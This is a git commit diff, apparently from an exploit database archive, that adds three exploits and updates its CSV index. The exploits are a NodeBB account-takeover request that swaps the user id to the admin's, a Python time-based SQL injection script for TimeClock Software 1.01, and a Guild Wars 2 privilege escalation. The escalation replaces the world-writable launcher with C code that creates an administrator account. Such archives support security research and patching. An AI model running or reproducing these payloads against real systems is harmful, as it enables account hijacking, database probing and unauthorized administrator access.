DB: 2020-10-15
3 changes to exploits/shellcodes Guild Wars 2 - Insecure Folder Permissions TimeClock Software 0.995 - Multiple SQL Injections TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection NodeBB Forum 1.12.2-1.14.2 - Account Takeover
This commit is contained in:
parent
973a669c08
commit
a3aad6c41a
4 changed files with 182 additions and 1 deletions
21
exploits/multiple/webapps/48875.txt
Normal file
21
exploits/multiple/webapps/48875.txt
Normal file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover
|
||||
# Date: 2020-08-18
|
||||
# Exploit Author: Muhammed Eren Uygun
|
||||
# Vendor Homepage: https://nodebb.org/
|
||||
# Software Link: https://github.com/NodeBB/NodeBB
|
||||
# Version: 1.12.2-1.14.2
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
|
||||
Impact:
|
||||
----------------------
|
||||
A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.
|
||||
|
||||
Bug PoC:
|
||||
----------------------
|
||||
Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
|
||||
1- Create a user
|
||||
2- Go to password change page
|
||||
3- Change password with proxy
|
||||
427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
|
||||
4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
|
||||
5- So you can login with this password to admin user.
|
50
exploits/php/webapps/48874.py
Executable file
50
exploits/php/webapps/48874.py
Executable file
|
@ -0,0 +1,50 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
|
||||
# Date: July 21, 2020
|
||||
# Exploit Author: François Bibeau
|
||||
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
|
||||
# Vendor Homepage: http://timeclock-software.net/
|
||||
# Software Link: http://timeclock-software.net/timeclock-download.php
|
||||
# Version: 1.01
|
||||
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
|
||||
|
||||
import time
|
||||
import requests
|
||||
|
||||
|
||||
login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
|
||||
login_data = {'username':'fred','password':'fred','submit':'Log In'}
|
||||
headers = {'User-Agent': 'Mozilla/5.0'}
|
||||
|
||||
# init session & login
|
||||
session = requests.Session()
|
||||
session.post(login_url,headers=headers,data=login_data)
|
||||
|
||||
# static list provided for PoC, could use a text file
|
||||
users = ['john','bill','tim','fred','garry','sid','admin']
|
||||
|
||||
for user in users:
|
||||
url = "http://159.203.41.34/add_entry.php"
|
||||
payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
|
||||
|
||||
data = {'data_month': '1',
|
||||
'data_day': '1',
|
||||
'data_year': '1',
|
||||
'type_id': '5',
|
||||
'hours': '1',
|
||||
'notes': payload,
|
||||
'submit': 'Add'}
|
||||
|
||||
print(f'Checking user {user}... ', end = '')
|
||||
|
||||
start = time.time()
|
||||
response = session.post(url,data=data)
|
||||
end = time.time()
|
||||
|
||||
delay = end - start
|
||||
|
||||
if delay > 5:
|
||||
print('User found!')
|
||||
else:
|
||||
print('')
|
107
exploits/windows/local/48876.txt
Normal file
107
exploits/windows/local/48876.txt
Normal file
|
@ -0,0 +1,107 @@
|
|||
# Exploit Title: Guild Wars 2 - Insecure Folder Permissions
|
||||
# Date: 2020-10-09
|
||||
# Exploit Author: George Tsimpidas
|
||||
# Software Link : https://account.arena.net/welcome
|
||||
# Version Build : 106915
|
||||
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
|
||||
# Category: local
|
||||
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
|
||||
Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges
|
||||
vulnerability which can be used by a simple user that can change the
|
||||
executable file
|
||||
with a binary of choice. The vulnerability exist due to the improper
|
||||
permissions,
|
||||
with the 'F' flag (Full) for 'Everyone' group, making the entire directory
|
||||
'Guild Wars 2' and its files and sub-dirs world-writable.
|
||||
|
||||
|
||||
# Local Privilege Escalation Proof of Concept
|
||||
|
||||
|
||||
D:\icacls "Guild Wars 2"
|
||||
Guild Wars 2 Everyone:(F)
|
||||
Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
|
||||
## Insecure File Permission
|
||||
|
||||
D:\Guild Wars 2icacls Gw2-64.exe
|
||||
Gw2-64.exe Everyone:(F)
|
||||
Everyone:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
|
||||
|
||||
|
||||
#0. Download & install
|
||||
|
||||
#1. Create low privileged user & change to the user
|
||||
## As admin
|
||||
|
||||
C:\net user lowpriv Password123! /add
|
||||
C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
|
||||
User name lowpriv
|
||||
Local Group Memberships *Users
|
||||
Global Group memberships *None
|
||||
|
||||
#2. Move the Service EXE to a new name
|
||||
|
||||
D:\Guild Wars 2whoami
|
||||
lowpriv
|
||||
|
||||
D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe
|
||||
1 file(s) moved.
|
||||
|
||||
#3. Create malicious binary on kali linux
|
||||
## Add Admin User C Code
|
||||
|
||||
kali# cat addAdmin.c
|
||||
int main(void){
|
||||
system("net user placebo mypassword /add");
|
||||
system("net localgroup Administrators placebo /add");
|
||||
WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
## Compile Code
|
||||
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe
|
||||
|
||||
#4. Transfer created 'Gw2-64' to the Windows Host
|
||||
|
||||
#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder
|
||||
|
||||
D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe .
|
||||
|
||||
#6. Check that exploit admin user doesn't exists
|
||||
|
||||
D:\Guild Wars 2net user placebo
|
||||
|
||||
The user name could not be found
|
||||
|
||||
#6. Reboot the Computer
|
||||
|
||||
D:\Guild Wars 2shutdown /r
|
||||
|
||||
#7. Login & now start the Guild Wars 2 Game, back doored launcher will be
|
||||
executed, and the user placebo will be created, and added to the
|
||||
Administrators group.
|
||||
|
||||
C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr
|
||||
/v "Full"
|
||||
|
||||
User name placebo
|
||||
Local Group Memberships *Administrators *Users
|
||||
Global Group memberships *None
|
|
@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port
|
|||
48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
|
||||
48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
|
||||
48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
|
||||
48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
|
||||
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
|
||||
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
|
||||
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
|
||||
|
@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port
|
|||
39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80
|
||||
39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,
|
||||
39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80
|
||||
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
|
||||
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
|
||||
39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80
|
||||
39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware,
|
||||
39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
|
||||
|
@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port
|
|||
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
|
||||
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
|
||||
48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
|
||||
48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
|
||||
48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue